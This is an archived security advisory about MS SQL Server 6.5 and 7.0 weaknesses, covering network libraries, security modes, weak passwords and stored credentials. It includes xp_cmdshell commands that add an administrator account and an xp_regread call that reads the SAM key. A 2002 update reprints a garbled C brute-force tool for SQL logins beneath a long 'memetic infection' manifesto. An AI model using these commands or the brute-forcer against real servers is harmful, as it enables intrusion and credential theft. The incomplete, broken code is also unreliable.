Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Windows Net Apps :: win1652.htm

MS SQL Weaknesses
14th Nov 2000 [SBWID-1652]

	    MS SQL




	    MS SQL 6.5, 7.0




	    'mount  ararat  blossom'  posted  following.   He released another

	    paper about SQL  hacking.  Not  sure what you  want to get  out of

	    this but basically  this paper is  intended on breaking  merely MS

	    SQL servers especially  versions 6.5 and  7.0 via TCP/IP  over the

	    port 1433.  There are not that many remote SQL server exploitation

	    techniques.   However there  are some...  Note that  text in  this

	    advisory is based on Chip Andrews's site regardirn sqlsecurity.


	    Most of  the time  MS SQL  server runs  on TCP  port 1433,  if not

	    configured  to  run  on  another  TCP  port.   There are some port

	    scanners  which  verifies  the  running  service on the open port.

	    Retina from the folks at eEye can do this favour for us.


	    SQL Server Network Protocol Libraries & Weaknesses


	    Named Pipes:

	    - Uses NT SMB ports (TCP 139, UDP 137,138) to communicate.   These

	      are usually blocked in  any decent firewall implementation,  but

	      that can be an advantage if all access is internal

	    - User  names, passwords,  and data  can be  sent unencrypted (not

	      using Integrated Security) for  anyone with a packet  sniffer to

	      see IP Protocol:

	    - If you leave  the TCP port with  the default value of  1433, you

	      open yourself up to port scanners that can immediately spot  the

	      SQL server

	    - Packet sniffer threat.  As there is no encryption.

	    - Client must support NT RPCs; in a heterogeneous environment this

	      can be trouble

	    - Uses random TCP  ports by default but  can be configured to  use

	      fixed  ports  to  ease  firewall  implementation (see KB article


	    - Make sure the encryption  option is selected; it's not  selected

	      by default


	    If  you  can  get  away  with  using Integrated (NT) Security over

	    Named Pipes or  Multi-protocol, then do  it.  If  possible, try to

	    use  multi-protocol  and  enable  encryption.   If  you  can't use

	    either of those, then use IP Sockets, change the default TCP  port

	    to something  else, and  pray you  don’t get  a packet  sniffer on

	    your segment.  Also, consider using a Web server or COM components

	    as the business object layer  for an application and use  a secure

	    channel between  the middle  tier and  the SQL  server.  This will

	    remove  some  of  the  client  connection  issues and allow you to

	    focus  on  encapsulation  of  business  logic  as well.  There are

	    several  third-party  products  that  can  encrypt  traffic  on  a

	    segment - look into them.


	    Security Modes of SQL 6.5 & 7.0


	    The security mode defines  how SQL Server will  authenticate users

	    attempting  to  make  use  of  its  services.  Check the following

	    table for  a description  of these  modes and  a breakdown  of the



	    Security Modes  SQL Server 6.5  SQL Server 7.0 changes

	    Standard        Logins are defined  within SQL Server   and  given

	                    passwords  SQL  Server  logins  are  separate from

	                    Windows  NT  accounts   Exclusive  Standard   Mode

	                    security is not available in SQL Server 7.0


	    Integrated      Use the Security Manager to create SQL logins  for

	                    NT  Server  user  accounts  Users  do  not have to

	                    specify a  separate login  and password  when they

	                    connect to SQL  Server Passwords are  never stored

	                    in  applications  and  never  transmitted in plain

	                    text  over  the  network  SQL  Server  gains   the

	                    benefits  of  using  NT  to authenticate users and

	                    use  features  such  as  account  expiration   and

	                    lockouts  Requires  Named  Pipes or Multi-Protocol

	                    libraries Now called `Windows NT only' mode SQL  7

	                    now  supports  integrated   security  across   all

	                    network protocol libraries


	                    Only works  on NT  Windows 95/98  installs do  not

	                    support this  mode (duh!)  Can integrate  directly

	                    with NT groups  for added ease  of administration.

	                    (Make  note  of  the  special  BUILTIN  group  for

	                    assigning groups on the local machine).


	    Mixed           Offers the features  of Integrated but can    fall

	                    back  to  support  clients  that  cannot establish

	                    trusted connections.  Let's face it this mode  may

	                    expose  you  to  the  weaknesses  of  both  modes.

	                    Tightening the security of both modes is a lot  of

	                    work.  Now called `SQL Server and Windows NT' mode

	                    Same  deal  use  with  caution.   Why  use  a weak

	                    security model if you don't have to?  Bottom line:

	                    If you can get  away with `Windows NT  only' mode,

	                    then use it.


	    Logging-in is only the first step.  Once a user logs in, he or she

	    must access  the individual  databases.   For this,  an entry must

	    exist  in  the  sysusers  table  for  each database for that user.

	    Keep a  close eye  on that  “guest” account  in your databases and

	    make  sure  you  don’t  inadvertently  give  someone  access  to a



	    Brute-Force Attack


	    Most  databases  have  some  default  and  well-known   passwords.

	    Moreover,  system  administrator  accounts  can  not be changed in

	    many of the commercial databases.  "sa" for SQL server and SYBASE,

	    "sys" for ORACLE can not be renamed.  There is no password lockout

	    available for SQL  server.  SQL  server does not  require a strong

	    password.  Due to this facts, it is possible to launch brute-force

	    password  attacks  against  the  database  server  with nothing to

	    prevent us from  patiently and persistently  trying to break  into

	    the server at the highest level access.


	    Our personnel choice is sqlbf from  Once

	    you get the administrative password, the game starts.


	    System Compromise Using Extended Procedures: (SQL 6.5)


	    Most  database   systems  have   powerful  features   that,  while

	    convenient for DBAs, are also potential backdoors into a  database

	    server's host operating system.


	    Most of the time, 'sa' account  has no password thanks to lazy  or

	    busy system admins.  Anyway once we get the password, our ultimate

	    aim is  compromising the  underlying operating  system, once again

	    most of the time it is a NT box.


	    By logging in as 'sa', an intruder has use of the “extended stored

	    procedures; 'xp_cmdshell', which allows  a SQL Server user  to run

	    an  operating  system  command  as  if  that  person was running a

	    command  prompt  at  the  server  console.   As  an  example,  the

	    following SQL  command will  add user  foo with  password bar into

	    windows NT account and then to the administrators group.

	        Xp_cmdshell `net user foo bar /ADD'

	        Xp_cmdshell `net localgroup /ADD Administrators foo'


	    Now, the unscrupulous  intruder is a  NT administrator, lets  hope

	    this box  is not  a domain  controller.   This simple attack works

	    because the commands are  submitted to the operating  system using

	    the NT account under which the SQL server runs under.  By  default

	    this is  the “local  system” account  which is  the most  powerful

	    account on the local NT system.


	    Another good way  of compromising NT  account is, as  every one of

	    us well knows,  reading the sam._  file under   winnt/repair/sam._

	    and  cracking  this  hashed  password  file with our favorite tool



	    To do this, we will use the extended stored procedure,  xp_regread

	    out of registry.  Below is the function do attain sam._ file

	        Xp_regread HKEY_LOCAL_MACHINE,SECURITYSAMDomainsAccount,F


	    If the system has applied syskey, which is default in Win2k,  then

	    this approach will be  useless.  You'd have  to be able to  upload

	    other tools, which you may or may not be able to do.


	    Note that reading the passwords out of registry is something  even

	    the local NT administrator  can not do.   SQL server allows us  to

	    do  this  because  SQL  server  by  default  runs using the "local

	    system" account.


	    Luckily we have a tool  performing this activity for us.   SQLPOKE

	    can be found from packetstorm tools factory.  Take a check.


	    Local Password Compromise: (SQL 6.5 & 7.0)


	    SA password is stored in clear text within the registry:

	        HKEY_CURRENT_USERSOFTWAREMicrosoftMSSQLServerSQLEWRegistered ServerSQL 6.5.


	    - Changing  the password  leaves residual  text from  the previous

	      passwords in the registry

	    - Changing security mode does not remove password. Entire password

	      is left with the exception of the first letter:

	      example: nopassword - opassword


	    For MS SQL 7.0, we have another vulnerability.  In the  encryption

	    used to  conceal the  password and  login ID  of a  registered SQL

	    Server user in  Enterprise Manager for  Microsoft SQL Server  7.0.

	    When registering  a new  SQL Server  in the  Enterprise Manager or

	    editing the  SQL Server  registration properties,  the login  name

	    that will  be used  by the  Enterprise Manager  for the connection

	    must be specified.  If a SQL Server login name is used instead  of

	    a Widows Domain  user name and  the 'Always prompt  for login name

	    and password' checkbox is not  set, the login ID and  password are

	    weakly encrypted and stored in the registry.


	    When a DBA (database  administrator) logs into a  workstation with

	    a  roaming  profile,  the  login  ID  and password are stored in a

	    registry key.  This information  is stored as the file  NTUSER.DAT

	    (for Windows NT) or USER.DAT  (for Windows 95 or Windows  98) when

	    the user logs off. An attacker can open this file in a text editor

	    to view the DBA login ID and password encrypted.  An attacker  can

	    reverse this  encryption to  gain access  to the  DBA login ID and



	    Remote and  local attackers  who acquire  the system administrator

	    password have full  control over the  database server software  as

	    well as full access to the content and integrity of the database.


	    The encryption  used to  conceal the  password and  login ID  of a

	    registered SQL Server  user in Enterprise  Manager for SQL  Server

	    7.0 can be reversed.  The encryption scheme used is an  alphabetic

	    substitution  where  each  Unicode  character  in  the password is

	    XOR'ed with  a two  byte value  according to  its position  in the

	    string.   If  the  'Always  prompt  for  login  name and password'

	    checkbox is not  set when registering  a SQL Server,  the login ID

	    and  password  is  weakly  encrypted  and  stored in the following

	    registry key:

	        HKEY_CURRENT_USERSOFTWAREMicrosoftMSSQLServerSQLEWRegistered Server X


	    By  design,  the  HKEY_CURRENT_USER  registry  hive is meant to be

	    available only to the currently logged  on user.  That is, when  a

	    different Windows NT user logs  onto the system, a different  copy

	    of the HKEY_CURRENT_USER  registry hive is  loaded.  In  practice,

	    the HKEY_CURRENT_USER registry hive  is saved locally as  the file

	    NTUSER.DAT or USER.DAT when a  user logs off.  This  registry hive

	    can be opened in Notepad  and the encrypted login ID  and password

	    can  be  easily  located.  If  the  DBA has a roaming profile, the

	    NTUSER.DAT file will  be saved on  every workstation the  DBA logs



	 Update (14 August 2002)



	Brute force attack code posted by memetic-engineer :

	/*ms sql brute thing found in wild, appears to be by some guy named adam

	 * No post meme =no post code. Don't sell to anyone please




	 *This text is a neurolinguistic trap, whose mechanism is triggered by

	*you at the moment when you subvocalize the words MeMe156, words that

	*have now begun to infiltrate your mind in the same way that a computer

	*virus might infect an artificially intelligent machine: already the

	*bits of phonetic information stored within the words MeMe156 are

	*using your neural circuitry to replicate themselves, to catalyze the

	*crystalline growth of their own connotative network.


	 *The words MeMe156 actually germinate via the subsequent metaphor into

	*an expanding array of icy tendrils, all of which insinuate themselves

	*so deeply into the architecture of your thoughts that the words MeMe

	*156 cannot be extricated without uprooting your mind.


	 *The consequences of this infection are not immediately obvious,

	*although you may find yourself beginning to think fleetingly of certain subcultural terms, such as

	*ANTI-SEC and WHITE-HAT-HOLOCAUST, which may in turn compel you to think of NEOGNOSTICISM and MEMETICS: the whispered fragments perhaps of some overheard conversation.


	 *We refer to ourself both as agent, and agency in, on, and about the www. We are symbiotic

	*substrain of Darren Wershler-Henry, Genesis P-Orridge, Dawkins, Moritz, and AC's #23 ( forever

	*useful in advanced symbiotic binding techniques such as copying-fidelity, fecundity, and

	*longevity). We refer to other, and in doing so, interweave their memetic approaches

	*with our own. From original /v23/substrain.virulent.excess, our growth has propagated exponentially

	*and has begun to infect the highest levels of INFOSEC, press, radio, and film.


	 *We refer to musical works, "Deer Dance" by SOAD, "Karma Police" by Radiohead and "Canon in D" by Johan Pachelbel.


	 *We refer to literary works, "Book of Five Rings",by Miyamoto Musashi, "Secret Societies and

	*Subversive Movements" by Nesta Webster, and "How to Think like Leonardo Da Vinci: Seven Steps to Genius Every Day" by Michael J. Gelb ( Substrain / in incubation stages).


	* We refer to the artistic work of "Obey Giant" and "Billboard Liberation Front"


	 *We refer to the following fields of study:

	*Complexity theory and post-structuralism;

	*Memetics as an integrative field for the study of ALL fields;

	*Autology as a means to community cohesion and survival.


	 *We refer to a self-propagating system of TAZ's (Temporary Autonomous Zones), within related, and

	*non-related mailing lists, IRC channels, and FreeNets which are working in loose alliance to affect

	*and direct the post-millenial attractor, utilizing the principle of auto.prophecy. We compel

	*approach toward TAZ's which concentrate on NEGentropic self-orginization rather than the deliberate

	*hastening of maximal entropy.


	* W/e refer to and admit our viral precursors, to which we are anti-genic, and posit our decendants

	*in struggle to fix the subsequent global attractor. We have an expiration date. Which we find VERY



	* We refer to multiple sub.strains of ourself, many of which are contradictory: We refer toagain to

	*the ultimate resistance of NEGentropic memetic antibodies which, once triggered by this antigen,

	*must be responsible for isolating entropic memes.


	* We refer to all signifiers, all that is signified, and the resultant significance on both global

	*and local scales.


	 *We refer to that which we contain, and that in which we are contained;


	 *We refer now to you.


	 *When you have finished reading the remaining nineteen words, this

	*process of irreversible infection will be completed, and you will

	*depart, believing yourself largely unaffected by this process.




	#include <stdio.h>

	#include <sys/time.h>

	#include <unistd.h>

	#include <string.h>

	#include <stdlib.h>

	#include <fcntl.h>

	#include <errno.h>

	#include <signal.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <netdb.h>

	#include <sys/types.h>

	#include <pthread.h>


	#define USERNAME_OFF 0x27

	#define PASSWORD_LEN1_PAD 0x45

	#define PASSWORD_TXT1 0x46

	#define PASSWORD_LEN_REAL1 0x64

	#define PASSWORD_LEN_REAL2 0xd3

	#define PASSWORD_TXT2 0xd4

	#define PASSWORD_LEN_PLUS2 0x1d1

	#define REPLY_TIMEOUT 5

	#define MYNULL "%%NULL%%"


	#include "libInet.c"


	struct super_mssql_force


	  u_long ip;

	  u_long port;

	  FILE *login_pass;

	  int sport;



	* Oh my! Tricky French comments ensue..

	char fidel_packet[] =



	/* | ici start l'username */


	/* | longeur du passe suivi du pass atention pading! */




	/* | longeur du pass real ou pad je sais pas */






	/* | longeur du pass sans pad et pass */















	/*****************| <== longeur du pass + 2 ***********/









	char *

	tstrstr(char *buff,char *w,int size)


	register int i;

	register int a;

	int d;

	int z;

	int ws = strlen (w);






	   for (a=0;a<strlen(w);a++) {

	      if(i+a >size)return(NULL);

	      if (buff[z++] == w[a]) d++;

	      else break;



	   if (d == ws)

	     return( (buff+i) );






	mssql_attack (struct super_mssql_force * mssql)


	char user[255];

	char pass[255];

	char tmp[4018];

	char * real_pkt;

	FILE * F;

	int s;

	int r;


	  while (1)



	       s = connect_ip (mssql->ip, mssql->port, mssql->sport);


	       if (s < 0)





	        if (feof (mssql->login_pass))


	        if (s)

	        close (s);

	        return (0);



	        memset (user,0,sizeof(user));

	        memset (pass,0,sizeof(pass));


	        fscanf (mssql->login_pass, "%s%s\n", &user, &pass);


	        if (strcmp (pass,MYNULL) == 0)

	           memset (pass,0,sizeof(pass));


	        real_pkt = calloc (1, sizeof (fidel_packet)-1);


	        memcpy (real_pkt, fidel_packet, sizeof (fidel_packet)-1);


	        strcpy ( (real_pkt + USERNAME_OFF), user);


	        * (real_pkt + PASSWORD_LEN1_PAD ) = strlen (pass) + 2;


	        strcpy ( (real_pkt + PASSWORD_TXT1), pass);


	        * (real_pkt + PASSWORD_LEN_REAL1) = strlen (pass);


	        * (real_pkt + PASSWORD_LEN_REAL2) = strlen (pass);


	        strcpy ( (real_pkt + PASSWORD_TXT2), pass);


	        * (real_pkt + PASSWORD_LEN_PLUS2) = strlen (pass) + 2;


	        if (write (s,real_pkt,sizeof(fidel_packet)) < 0)


	          perror ("write");




	        if ( (r = read (s,tmp,sizeof (tmp)) ) < 0)


	          perror ("read");




	        if (tstrstr (tmp,"Login failed",r))


	          fprintf (stderr,"login failed for %s/%s\n",user,pass);

	          close (s);




	        printf ("%s:%s\n",user,pass);

	        close (s);






	usage (char * name)


	printf ("ADAM's Ethical Crowbar! \n");

	printf ("never forget your crowbar !\n");

	printf ("%s <host> <port> -t <thread num> -s <src port>\n",name);

	exit (0);



	main (int argc, char **argv)


	  pthread_t **pthread_id;

	  int t_num = 3;

	  int i;


	  struct super_mssql_force mssql;


	  memset (&mssql, 0, sizeof (mssql));


	  if (argc < 3)

	    usage (argv[0]);


	  mssql.ip = host2ip (argv[1]);

	  mssql.port = atoi (argv[2]);


	/* we ignore Broken Pipe ! */

	  signal (13, SIG_IGN);


	  if (argc > 3)


	      for (i = 3; i < argc; i++)


	          if (argv[i][0] == '-')

	            switch (argv[i][1])


	              case 't':

	                t_num = atoi (argv[i + 1]);




	              case 's':

	       = atoi (argv[i + 1]);







	/* we read login password from the stdin */


	  mssql.login_pass = stdin;


	/* only one socket can bind at the same src port */


	  if (


	      t_num = 1;

	      fprintf (stderr,

	               "*** WARNING WHEN YOU USE THE SRC THREAD NUM ARE SET TO 1 ***\n");



	  fprintf (stderr, "mssql sport %i\n",;

	  fprintf (stderr, "thread %i\n", t_num);


	/* if the user dont know how try the mssql allow we count it for him! */


	  pthread_id = calloc (1, sizeof (pthread_t *) * t_num);


	  for (i = 0; i < t_num; i++)

	    pthread_id[i] = calloc (1, sizeof (pthread_t));


	  for (i = 0; i < t_num; i++)

	    pthread_create (pthread_id[i], NULL, (void *(*)()) mssql_attack, &mssql);


	  for (i = 0; i < t_num; i++)

	    pthread_join (*pthread_id[i], NULL);





	    Watch your servers in wild.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH